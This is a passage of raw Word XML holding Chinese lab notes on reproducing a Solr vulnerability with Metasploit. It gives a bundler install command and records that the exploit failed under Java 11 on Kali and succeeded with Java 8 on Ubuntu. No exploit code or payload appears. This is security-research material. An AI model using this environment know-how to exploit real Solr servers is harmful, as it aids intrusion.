        <w:t>由于默认安装的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bundler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为最新版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.1.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依赖的版本为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.17.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以需要安装旧版本。执行如下命令：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C" w:rsidP="004F174C">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root@kali:~# gem install bundler:1.17.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="00C10A2D" w:rsidP="004F174C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C" w:rsidP="00FD3311">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>失败原因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10A2D" w:rsidRDefault="004F174C">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搭建环境失败：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:t>下</w:t>
      </w:r>
      <w:r>
        <w:t>搭建的漏洞环境，然后</w:t>
      </w:r>
      <w:r>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:t>多次后仍旧失败，经查看发现</w:t>
      </w:r>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:t>下的</w:t>
      </w:r>
      <w:r>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:t>版本是</w:t>
      </w:r>
      <w:r>
        <w:t>openjdk version "11.0.6" 2020-01-14</w:t>
      </w:r>
      <w:r>
        <w:t>，怀疑可能是</w:t>
      </w:r>
      <w:r>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:t>版本过高导致的利用失败，故在</w:t>
      </w:r>
      <w:r>
        <w:t>ubuntu16.04_x64_en-us</w:t>
      </w:r>
      <w:r>
        <w:t>下使用</w:t>
      </w:r>
      <w:r>
        <w:t>java8</w:t>
      </w:r>
      <w:r>
        <w:t>重新搭建</w:t>
      </w:r>
      <w:r>
        <w:t>solr-8.2.0.zip</w:t>
      </w:r>
      <w:r>
        <w:t>，漏洞利用成功。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10A2D" w:rsidRDefault="004F174C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>看到过别人在</w:t>
      </w:r>
      <w:r>
        <w:t>java10</w:t>
      </w:r>
      <w:r>
        <w:t>下也有利用成功的经验，怀疑可能</w:t>
      </w:r>
      <w:r>
        <w:t>exp</w:t>
      </w:r>
      <w:r>
        <w:t>针对</w:t>
      </w:r>
      <w:r>
        <w:t>java10</w:t>
      </w:r>
      <w:r>
        <w:t>及以下的版本才有效</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C1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41"/>
    <w:rsid w:val="000B0E80"/>
    <w:rsid w:val="0010495A"/>
    <w:rsid w:val="001C3DE7"/>
    <w:rsid w:val="002C3E08"/>
    <w:rsid w:val="003246F2"/>
    <w:rsid w:val="004916AC"/>
    <w:rsid w:val="004F174C"/>
    <w:rsid w:val="005004CC"/>
    <w:rsid w:val="00626253"/>
    <w:rsid w:val="0063622A"/>
    <w:rsid w:val="00706A40"/>
    <w:rsid w:val="008C4E41"/>
    <w:rsid w:val="00A8047F"/>
    <w:rsid w:val="00A90A99"/>
    <w:rsid w:val="00A95C17"/>
    <w:rsid w:val="00C10A2D"/>
    <w:rsid w:val="00CB2251"/>
    <w:rsid w:val="00FD3311"/>
    <w:rsid w:val="4D07473E"/>
    <w:rsid w:val="605C417B"/>
    <w:rsid w:val="7A7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DAAAD-8AFE-4233-A377-E991835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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-14T05:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-23T07:07:00Z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